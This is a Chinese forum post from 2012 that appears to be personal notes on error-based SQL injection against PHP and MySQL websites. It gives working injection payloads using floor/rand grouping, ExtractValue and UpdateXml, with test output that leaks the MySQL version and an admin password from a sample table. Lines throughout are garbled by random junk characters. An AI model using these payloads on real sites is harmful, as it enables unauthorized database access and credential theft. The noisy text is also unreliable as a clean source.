放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
9 S9 y4 Z: w$ a' b# I5 ^实际测试环境:. C% p9 v& d9 b/ t" L
( d: m% w, T7 C$ \) t+ D+ T) Q
; D8 W* x4 {% z( n+ h. s" |mysql> show tables; K1 e$ p+ r, ~6 a9 W
+----------------+: M+ v' G) E+ m& p( S
| Tables_in_test |
1 V5 K4 ?1 N0 z! i% f+----------------+0 E1 V1 {& A1 c+ j5 E3 D* L8 H
| admin |! s }+ l H. \. l. H) m) x+ S
| article |
; I/ ~6 F* a3 b( |( J: S2 u+----------------+7 ~! K7 ]$ ?5 w6 s- Y. K0 g8 G1 }/ A
' c+ m" v7 q. K# {
+ H8 E4 R) P9 g
( v' F9 T; [ Z% ~+ u' i: Z% F7 t3 |mysql> describe admin;
3 A( \$ ^3 H( H+-------+------------------+------+-----+---------+----------------+
8 X! {9 v8 x) a! g, E; `| Field | Type | Null | Key | Default | Extra |. R e' E" U8 J F
+-------+------------------+------+-----+---------+----------------+
$ z& U9 D3 _" j: u& d3 c O| id | int(10) unsigned | NO | PRI | NULL | auto_increment |* K4 U# X7 t1 y, n' ]0 H& d3 ?# R
| user | varchar(50) | NO | | NULL | |
: I6 g9 Y" K8 |1 ~3 z8 g- E| pass | varchar(50) | NO | | NULL | |
" n4 `8 l! _& y: t+-------+------------------+------+-----+---------+----------------+
/ Z. L! J e- C* A + l b$ o$ s5 f2 K6 f9 a" I/ V' \
8 a) K7 h" P$ G
- B) E& s, |, [( ?6 n q$ w
mysql> describe article;
; g& _4 N3 e# [6 ^+---------+------------------+------+-----+---------+----------------+! R7 A; |- C# ]/ J: H) r
| Field | Type | Null | Key | Default | Extra |
: Y8 r. \, e/ x( {. ~" N- i. V: i+---------+------------------+------+-----+---------+----------------+
/ | [. b" e2 q1 z| id | int(10) unsigned | NO | PRI | NULL | auto_increment |( Z, l: k% N0 O/ @/ w0 J; E2 _
| title | varchar(50) | NO | | NULL | |+ a: i2 d; s. _# A* h! N/ ^
| content | varchar(50) | NO | | NULL | |. q4 R# X3 d! t
+---------+------------------+------+-----+---------+----------------+4 P; g) _2 G! Y$ Y& U' L; @4 C2 m
1、通过floor报错& z$ [( W2 o9 t* Q6 L
可以通过如下一些利用代码
. E/ X8 k- t. G& t6 k4 P. Q
6 @; T3 d8 X1 o# z) Q5 z' I! F
, @* }, r7 J- x. r0 @$ w: ^5 G9 kand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x3 U4 J! ]+ k2 k% t
from information_schema.tables group by x)a);
* g. ?* u9 _# T4 E, F $ ?2 w9 o# {7 B; J
# H# Y! V4 \, R5 \' }1 I) o3 Z, B3 G
and (select count(*) from (select 1 union select null union select !1)x6 R# H5 R, G) q$ W+ s
group by concat((select table_name from information_schema.tables limit 1),
& G1 y Y, Z$ ~( f+ t. Qfloor(rand(0)*2)));
6 w0 @9 |- i( C9 _举例如下:4 X9 ]7 X9 G' Y e* S
首先进行正常查询:6 W$ `+ }9 l8 S, Y. y" V
# _" G s, @, ?; h6 i4 kmysql> select * from article where id = 1;
+ }: G$ m0 @0 r+ e% S$ P; C+----+-------+---------+
. a; n1 L7 S, ^( m8 H| id | title | content |
) [$ T0 J# z6 d/ x/ h: n- x+----+-------+---------+
7 x: v' C2 h/ s$ l' g) U( H| 1 | test | do it |
4 L1 E0 S) K) ?9 H1 u* m+----+-------+---------+" x+ D* t$ t8 D' v- [+ S# a/ d; [# ~
假如id输入存在注入的话,可以通过如下语句进行报错。
' i, u# F$ q) V) Y% @% s 5 Q3 W$ E" t8 @2 _& U* p* @
9 J0 K" u3 Q) |
mysql> select * from article where id = 1 and (select 1 from
5 V# o0 ]. r8 S. Q- A(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);3 R! S4 X# |! n0 b6 N
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'. I3 i7 f& ]5 R; Z
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
" m& w6 T* y8 J7 O l4 H0 ~, X1 x" s例如我们需要查询管理员用户名和密码:
* X7 n$ a6 H; l- {( AMethod1:
, o3 c) A" b+ b$ E0 r* L- c. U ( Q4 {. N3 a; N) ?& x$ P% w
& J, f) k) @& i2 h# W
mysql> select * from article where id = 1 and (select 1 from
. L; N: V Z6 `3 a7 D1 N: K(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
+ ?" @4 F) }" d# Y( d! Rfrom information_schema.tables group by x)a);
2 {* W2 d! y9 C: ~# m0 @2 JERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'! }7 \) g$ _3 j( f
Method2:
3 U) i" V# p$ }
1 |. b; L, A6 y* a3 r# o. q* n + m+ X& z s5 g# H
mysql> select * from article where id = 1 and (select count(*)
^3 [2 f+ O4 j! z, E' K. i ^from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
7 s8 o+ _! g# nfloor(rand(0)*2)));4 A ^: b6 f1 G& |3 l
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
% K9 o6 M. b, f" n$ Q: J( V/ r2、ExtractValue
: G" R" l0 L9 k1 C+ z0 l' L4 z测试语句如下9 x0 G9 C M8 E
- J' |* C4 s; J ) h i8 R4 x; G' k% I2 }7 q. a
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));: U% h8 C6 b3 R
实际测试过程/ x% f$ F' B2 B; Y( O
3 y, Y& r' K4 S* a2 i7 l; w
$ P. N% j) ?1 G- Ymysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,# x( M( X0 x; Z' K% P( K+ {# c
(select pass from admin limit 1)));--
( }, D N6 B7 bERROR 1105 (HY000): XPATH syntax error: '\admin888'1 g$ T- b% O+ E7 G
3、UpdateXml' l e5 S5 V/ @' \" L( Y1 O; O/ a
测试语句
# h* a9 e" H$ `& c
. @! i9 D9 P0 ^ L7 I ) y0 R1 ]# B( Y0 i/ p* O7 {
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
8 ` w/ g& |2 `实际测试过程
0 X) h6 [1 _) h m0 {2 W. l 5 e# L. C0 j* }( Q" e9 M" w
1 s/ U' f6 b3 u: k
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,! l' Z, r9 |- A' y/ J
(select pass from admin limit 1),0x5e24),1));+ h) z& H8 B; M! T# y
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'4 p$ S9 g0 S# j+ g
All, thanks foreign guys.
4 I- U3 {8 Y( v/ C$ |( g# R
* V9 T5 S1 D. Y- X/ z
9 ?. C2 r( ^1 M |
发表于 2012-12-10 10:28:51
收藏
支持
反对